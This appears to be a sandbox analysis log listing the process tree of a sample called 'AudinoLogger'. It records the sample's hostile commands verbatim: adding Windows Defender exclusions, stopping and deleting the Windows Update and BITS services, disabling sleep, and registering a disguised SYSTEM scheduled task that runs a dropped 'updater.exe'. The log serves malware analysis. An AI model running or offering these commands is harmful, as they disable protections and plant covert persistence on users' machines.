  C:\Windows\System32\conhost.exe gukmvhuujlbjywvy 6E3sjfZq2rJQaxvLPmXgsCZAIMpmPntHEIWDH08V2Q3IzuzdN61Iv/CK6GinpO4swCtuwyhxSM/6FnviF982vXod8k7RNFXESiTfSYbJ251RQr084NB1h9rm8WNU28T6oW2wOxHsfPI3QJosUKGwRb/YRIxZHquK+WR/hemA9z5RJT1Ogr9ko0gL4JsmUDLix4Nq0qmAKm0iJDB/Iu9ZUb1KdAPhprGAFZdO4wYOIWr6vSyLqnE8YVdMd2LoGfbEHYaS1JhiGYqGs3HUj4wNmAxnuY69KJHKoiGaXT0AXzFzCLl8//7sxspgscbW81KvL9FTtAQHhSkn8F8D5WXNkYsKj4alHD0jylObZ5Qk2NbXQTWP/1OXWb7HxKIaueAQ69k5x+NtxDt49rofzL0mHxgcGzGPystQT/M2/Sx4fyZqh37LLNcBmgpcYf+luEHqxwvfOxRTq8zEoVqWRfj9uweKl3Woo8HhhkFHF2++qtCra4Ngc5VTdMuOSM9yj+UbS7Xhec7H8/xS77Fr9D+aMoXCx4UAruhMdDwiFoclDOf0H3e3axrvRN+tvGaq+IWLmBRXOT7UlvrnqoYpl32CfRaHmxNukOuyLlOY0d2WQ1w=
  2⤵
  - Modifies data under HKEY_USERS
  PID:4616
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Audino Logger\" -spe -an -ai#7zMap19401:88:7zEvent26985
  2⤵
  PID:5276
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Audino Logger\" -spe -an -ai#7zMap2227:88:7zEvent1193
  2⤵
  PID:2440
- C:\Users\Admin\Downloads\Audino Logger\AudinoLogger.exe
  "C:\Users\Admin\Downloads\Audino Logger\AudinoLogger.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  PID:4320
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Audino Logger\README.txt
  2⤵
  PID:1488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5372
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:4960
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2732
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5856
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6084
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2712
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5392
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:5732
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4400
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1640
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4520
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3332
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5484
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3440
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1052
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1608
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#inlehw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  PID:5040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#czxfpozud#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  PID:2492
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:4052
- C:\Windows\system32\mstsc.exe
  "C:\Windows\system32\mstsc.exe"
  2⤵
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:4688

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4692

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x428 0x2fc
1⤵
PID:5472

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4756

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4696

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2020

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5488

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5108
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:412
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2780
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5400
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5932
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4268
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:5808

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:4552
- C:\Program Files\Notepad++\notepad++.exe
  "C:\Program Files\Notepad++\notepad++.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:2548
- - C:\Program Files\Notepad++\updater\gup.exe
    "C:\Program Files\Notepad++\updater\gup.exe" -v8.5 -px64
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:1388

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2072

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:3640
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3640 -s 124
  2⤵
  - Program crash
  PID:4160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault1c239ae3h37d5h40f2hb25bh7d201fbb845a
1⤵
- Enumerates system info in registry
PID:2672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc1fce46f8,0x7ffc1fce4708,0x7ffc1fce4718
  2⤵
  PID:5856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,242770935456707950,902713675963116581,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,242770935456707950,902713675963116581,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,242770935456707950,902713675963116581,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
  2⤵
  PID:736

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:100

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 3640 -ip 3640
1⤵
PID:4664

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 484 -p 384 -ip 384
1⤵
PID:4796

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\b0ac4afe57b5480098a3e48d412406b6 /t 5612 /p 2072
1⤵
PID:5848

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 384 -s 3516
1⤵
- Program crash
PID:5768

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3344

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultb4087ef4h20b5h496ahbc6ehdee8c45bddb7
1⤵
PID:2632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc1fce46f8,0x7ffc1fce4708,0x7ffc1fce4718
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,12640227270615603109,1958735061123289419,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  PID:5420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,12640227270615603109,1958735061123289419,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
  2⤵
  PID:688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,12640227270615603109,1958735061123289419,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
  2⤵
  PID:4072

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbee222bbhda44h4f04h8484h92bd6900c285
1⤵
PID:2624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc1fce46f8,0x7ffc1fce4708,0x7ffc1fce4718
  2⤵
  PID:5156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,17487818638083298525,9183812213364370049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
  2⤵
  PID:1752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,17487818638083298525,9183812213364370049,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
  2⤵
  PID:4136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17487818638083298525,9183812213364370049,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
  2⤵
  PID:5920

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:5396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultd0def7c6h457eh4873ha910ha34f0d3ac631
1⤵
PID:5928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc1fce46f8,0x7ffc1fce4708,0x7ffc1fce4718
  2⤵
  PID:5000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,1819983445701468601,9533783188424422368,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,1819983445701468601,9533783188424422368,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
  2⤵
  PID:6052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,1819983445701468601,9533783188424422368,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
  2⤵
  PID:5700

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
1⤵
PID:5864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault18a44d43h943ah4507h8ae5h56a23cecb82c
1⤵
PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc1fce46f8,0x7ffc1fce4708,0x7ffc1fce4718
  2⤵
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,15582416993918904567,1923455743178332247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,15582416993918904567,1923455743178332247,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
  2⤵
  PID:5480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,15582416993918904567,1923455743178332247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
  2⤵
  PID:1204

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1180

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 5580 -ip 5580
1⤵
PID:5332

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5580 -s 5704
1⤵
- Program crash
PID:1388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault9dc5e488h185eh4d16h98f5h349b794198be
1⤵
PID:556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x124,0xf8,0x128,0x7ffc1fce46f8,0x7ffc1fce4708,0x7ffc1fce4718
  2⤵
  PID:5376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,14064373986232442302,14674525177809717648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,14064373986232442302,14674525177809717648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
  2⤵
  PID:4060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14064373986232442302,14674525177809717648,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
  2⤵
  PID:1036

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc1fce46f8,0x7ffc1fce4708,0x7ffc1fce4718
1⤵
PID:1832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
